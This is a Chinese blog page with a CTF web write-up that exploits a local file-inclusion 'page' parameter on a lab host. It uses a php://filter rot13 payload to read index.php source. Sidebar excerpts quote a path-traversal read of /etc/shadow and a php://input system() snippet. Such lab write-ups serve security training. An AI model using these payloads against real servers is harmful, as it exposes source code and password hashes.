CTF---Web---文件包含---02---rot13伪协议

最新推荐文章于 2024-05-11 15:18:25 发布
最新推荐文章于 2024-05-11 15:18:25 发布
阅读量1.5k 收藏 8
点赞数 1
分类专栏: CTF web 刷题记录 文章标签: CTF web 文件包含 刷题记录 hgzzk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22160557/article/details/119174803
版权

文章目录

前言

题目分类:

CTF—Web—文件包含—02—rot13伪协议

一、题目描述

题目:13、另辟蹊径 (题号为13)

在这里插入图片描述

二、解题步骤

1、页面跳转

Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。
在这里插入图片描述

2、文件包含(参数为page)

Step2:点击信息的时候,URL会发生变化:http://192.168.87.183/index.php?page=index表示page可以被赋值。

(文件包含特征)
在这里插入图片描述

3、rot13伪协议包含

Step3:page=php://filter/read=string.rot13/resource=index.php,此时将读取到index.php的内容中隐 藏的rot13格式的网站源码

显示出来。可以理解为将rot13编码的源 码隐藏在index.php,利用这个payload的可以读出隐藏文件。

4、rot13伪协议读取

Step4:访问http://192.168.87.183/index.php?page=php://filter/read=string.rot13/resource=index.php

右键查看源代码,可以看到rot13编码的密文
在这里插入图片描述

最低0.47元/天 解锁文章
ygxzq520
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF---Web---文件包含---09--etc/shadow
qq_22160557的博客
07-28 471
文章目录前言一、题目描述二、解题步骤1、 构造payload三、总结 前言 题目分类: CTF—Web—文件包含—09–etc/shadow 一、题目描述 题目: 文件包含 链接:http://172.16.15.216/stage/12/ 二、解题步骤 1、 构造payload 读取linux的/etc/shadow文件,用#截断目录 http://172.16.15.216/stage/12/show.php?file=…/…/…/…/etc/shadow# 三、总结 1、/etc/shadow
CTF---Web---文件包含---10---三种本地包含
qq_22160557的博客
07-29 828
文章目录前言一、题目描述二、逻辑解析三、解题方法1、将flag.php读入变量hello中2、 eval存在命令执行漏洞,用hello构造payload3、构造协议四、总结 前言 题目分类: CTF—Web—文件包含—10—三种本地包含 一、题目描述 题目: 文件包含 二、逻辑解析 <?php include "flag.php"; //可知flag在flag.php里, $a = @$_REQUEST['hello']; //$_REQUEST[]支持get
php协议编码rot13,PHP协议 - osc_npubdjvi的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_35864328的博客
03-26 403
php://filter 是一种元封装器。结合include(),file_get_contents(),file_put_contents()使用,include()经常会造成任意文件读取漏洞,而file_get_contents()和file_put_contents()这样函数下,常常会构成getshell等更严重的漏洞。语法格式 resource= //这个参数是必须的。它指定了你要筛...
2024年最新网络安全CTF ——web_文件包含,2024年最新系列教学
最新发布
2401_84545213的博客
05-11 1075
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CG CTF-Web-文件包含
feng的博客
09-05 293
WP 由于题目比较简单,不扯什么心路历程了,直接上WP。 首先看到题目就知道是文件包含,即使题目没有明说,点击链接。 发现了?file=show.php。 也需要知道这大概率就是文件包含了。我因为之前有个题目看到这样的没有察觉,导致跑偏了。既然错过了一次,就要吸取经验。 知道了文件包含,就利用文件包含相关的知识点去解题。 我首先用了php://input,结果出了Oh, on。我以为是过滤了php:,所以我换了一种协议: data://text/plain,<?php system("ls /")
CTF之萌新web学习(文件包含)
bmth666的博客
01-13 649
文件包含漏洞 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 相关函数 include() include_once() require() require_once() include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函...
DVWA之File Inclusion(文件包含)
谢公子的博客
10-01 9640
目录 LOW: Medium: High Impossible LOW: 源代码: &lt;?php // The page we wish to display $file = $_GET[ 'page' ]; ?&gt; 可以看到,low级别的代码对包含文件没有进行任何的过滤!这导致我们可以进行包含任意的文件。 当我们包含一个不存在的文件 haha.php ,看看会发生...
CTF-Web-常用协议用法:
半岛铁盒的博客
12-08 1176
常用协议用法: 1.php协议 用法 php://input,用于执行php代码,需要post请求提交数据。 php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php 需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp 不需要开启allow_url_fopen:php://filter 2.、data协议 用法: da
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-MISC关于各类编码习题(湖工商扛把子)
03-17
这类题目通常测试参赛者对不同编码格式的理解和应用能力,包括但不限于ASCII、Unicode、Base64、Hex、URL编码、ROT13、Caesar密码等。下面我们将深入探讨这些编码方式及其在CTF中的应用。 1. ASCII编码:ASCII是...
CTF-反编译相关资料
03-11
包括学习的PPT,常见的用于反编译的工具,CaptfEncoder-win-x64-3.1.2.exe、CTF-Tools-v1.3.7.zip、GDA4.02.zip、jadx-gui-1.4.3-with-jre-win.zip
CTFweb篇-PHP协议的使用
weixin_44597701的博客
08-05 1405
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。(不明白啥子鬼意思) 就是PHP协议可以用来作为输入输出,以此来占为己用 php://stdin 相当于打开一个文件指针,可以从输入缓冲区读取输入。 ...
ctf协议
qq_42307546的博客
10-02 205
文件包含
Hydra的博客
10-12 306
php包含函数 include():执行到include时才包含文件,找不到被包含文件时只会产生警告,脚本将继续进行 require():只要程序一运行就包含文件,找不到包含文件时会产生致命错误,并停止脚本 include——once()和require_once():若文件中已被包含则不会再次包含   利用php://filter作为一个中间流来处理其过滤器名称来处理其他流,共有四个...
一个关于本地包含和PHP协议的CTF题(Bugku——flag在index里)
weixin_44377940的博客
04-14 1341
在点开题目链接,查看源代码之后,我们看到这个界面: 这看起来没什么,我们点击链接之后,发现它的URL发生了变化: 看到file,即想到了本地文件包含漏洞。 根据题目flag在index里,但index文件并没有flag,因为PHP代码是后端解析实现,不会在前端显示代码,所以返回的是运行结果。于是想到我们可以使用PHP协议来读取隐藏的内容,关于PHP协议的内容,可以参照PHP手册相关内容(可...
ctf赛题上传一个php木马,文件上传的ctf_web题目【协议
weixin_34816913的博客
03-17 1057
1.第一题Qiyu_20170807_210121.png文件包含可以读到php源代码源代码:require("header.php");$page="";if (isset($_GET['page']))$page=$_GET['page'].".php"; #page参数自动添加了.php后缀,因此文件包含的index不需要加后缀else$page="main.php";include(...
文件包含-协议filter
08-22
协议filter是一种用于文件包含协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP中,可以使用php://filter协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值